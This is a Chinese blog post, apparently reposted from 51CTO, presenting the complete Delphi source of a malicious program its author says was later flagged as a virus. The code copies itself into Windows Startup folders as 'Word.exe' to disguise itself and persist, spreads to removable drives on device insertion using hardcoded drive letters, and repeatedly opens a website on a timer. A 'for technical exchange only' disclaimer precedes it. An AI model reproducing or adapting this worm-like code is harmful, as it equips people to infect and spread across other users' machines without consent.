一个delphi开发的恶意程序代码

简介:
这个delphi程序是去年上半年为了测试病毒和病毒代码库所做的恶意程序,功能有:程序运行后,会将自己添加到系统启动项中,如果有u盘接入,会自动copy自己到优盘上,还可以在指定时间内,在系统后台进行某些操作,比如打开网页什么的,该程序已经在去年被列为病毒了。本文只做技术交流,请勿用于非法用途,出现任何问题,本人概不负责。下面时代码,dephi7开发,用了一个timer控件:
unit Unit1;
interface
uses
    Windows, Messages, SysUtils, Variants, Classes, Controls, Forms,
  Dialogs,ShellApi,StdCtrls, ExtCtrls;
type
  TForm1 = class(TForm)
    Timer1: TTimer;
    procedure FormCreate(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
  private
    { Private declarations }
    procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
  public
    { Public declarations }
  end;
var
  Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.WMDeviceChange (var Msg: TMessage);
var
   //myMsg : String;
   m_Result,i:Integer;
   str_temp:string;
   buf:array   [0..MAX_PATH-1]   of   char;
begin
   Case Msg.WParam of
   32768:
begin
   //myMsg :='U盘插入';
   //Label1.Caption:=myMsg;
  m_Result:=GetLogicalDriveStrings(MAX_PATH,buf);
     for i:=0 to (m_Result div 4) do
  begin
        str_temp:=string(buf[i*4]+buf[i*4+1]+buf[i*4+2]);
         if getdrivetype(pchar(str_temp)) = DRIVE_CDROM  then
         begin
            if  str_temp ='E:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('F:\Word.exe'),False);
            if  str_temp ='F:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('G:\Word.exe'),False);
            if  str_temp ='G:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('H:\Word.exe'),False);
            if  str_temp ='H:\' then
            CopyFile(Pchar(Application.ExeName),Pchar('I:\Word.exe'),False);
   end;
   end;
   end;
   32772:
begin
   //myMsg :='U盘拔出';
   //Label1.Caption:=myMsg;
end;
   end;
end;
 
procedure TForm1.FormCreate(Sender: TObject);
begin
if fileexists('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe') and fileexists('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe')then
else
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe'),False);
//FileSetAttr('C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Word.exe',FILE_ATTRIBUTE_HIDDEN);
CopyFile(Pchar(Application.ExeName),Pchar('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe'),False);
//FileSetAttr('C:\Documents and Settings\new\「开始」菜单\程序\启动\Word.exe',FILE_ATTRIBUTE_HIDDEN);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
var

  strurl:string;
begin
  StrUrl:='http://www.cnking.org';
  ShellExecute(0,'open',pchar(StrUrl),nil,nil,SW_SHOW);
  end;

end.




本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/313303,如需转载请自行联系原作者
相关文章
|
2月前
|
存储 SQL 安全
【恶意代码系列】一.何谓恶意代码
【恶意代码系列】一.何谓恶意代码
|
2月前
|
安全
某留学网站被植入利用 PPStream 堆栈漏洞的代码
某留学网站被植入利用 PPStream 堆栈漏洞的代码
|
安全 Go API
自写go加载器加壳免杀——过国内主流杀软
自写go加载器加壳免杀——过国内主流杀软
455 0
|
小程序 JavaScript 安全
小程序逆向分析 (一)
小程序逆向分析 (一)
小程序逆向分析 (一)
|
Java
[恶意代码分析]恶意代码种类以及分析环境介绍
[恶意代码分析]恶意代码种类以及分析环境介绍
406 1
[恶意代码分析]恶意代码种类以及分析环境介绍
|
IDE API 开发工具
AirtestIDE有哪些好用但是非常隐蔽的小功能?
AirtestIDE有哪些好用但是非常隐蔽的小功能?
324 0
如何修复phpdisk网站程序代码漏洞
phpdisk是目前互联网最大的网盘开源系统,采用PHP语言开发,mysql数据库架构,我们SINE安全在对其网站安全检测以及网站漏洞检测的同时,发现该网盘系统存在严重的sql注入攻击漏洞,危害性较高,可以直接获取网站的管理员账号密码,利用默认后台地址登录,可以直接获取webshell权限。
2009 0
|
程序员 数据库
被外包程序员植入了后门程序,触发后删除数据库但他们死不承认,该怎么办?
被外包程序员植入了后门程序,触发后删除数据库但他们死不承认,该怎么办?
2036 0